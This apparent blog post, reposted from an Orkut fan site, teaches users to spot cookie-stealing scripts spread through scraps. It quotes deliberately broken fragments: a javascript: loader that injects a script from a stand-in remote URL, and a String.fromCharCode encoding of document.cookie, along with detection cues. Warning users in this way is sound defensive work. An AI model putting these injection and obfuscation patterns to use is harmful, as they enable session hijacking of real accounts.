How to Detect One : Is This a Cookie Stealing Script?
Title would seem confusing, but we think it's time to let you know how you can detect a cookie stealing script , thus avoiding a disaster. Unfortunately, Orkut has become more of a place of misuse than a social networking site. This would in a way help you playing safe on orkut and avoid using dangerous scripts which are forwarded to you or you stumble upon in a community.
If you have a look at the screen shot, you'll notice one of my contacts sending me a scrap with a cookie stealing script. Basically he has been hacked and the hacker is now using scrap all friends to scrap all his friends who may believe that their dear friend is sending them a script and they would not hesitate to use it.
This can happen to anyone of us. So it's necessary for all of us to recognize which scripts are there for our cookies.
There are 3 cookie stealing scripts on orkut at this point of time :NOTE | These scripts have been edited to a large extent so that no one can use it.This is just a learning process thus there is no way can provide anyone with anything as such so kindly don't scrap or mail for similar requests.
The Normal Script - If you read the script carefully, you get to see the profile id of the hacker and document.cookie call which is the spine of this script.
In case you ever see a UID=123456722489 and document.cookie in a script then you must remember - Never Ever Run that script.
Url Encoded Script - This script consists of a link which is usually a user.js
javascript:increasing_members=document.get('head')[0]; a=document.xxxxElement('scrirpt'); a.src='
http://anylink.js'; c.append(a); void(0)
This anylink.js refers to a grease monkey script.It may also be a tinyurl which we have discussed earlier.
Document.Cookie Encoded - This is the latest and most used script on orkut these days. Unfortunately, i have seen a lot of them in many scrapbooks and communities. Tn This Script, the cookie stealing function is coded hence not easily detectable.
String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)
The numbers shown above when decoded show up = document.cookie . I hope you can guess what they can be used for.
We hope you support our effort and help us spread the word to reach the masses.
Source:
OrkutPlus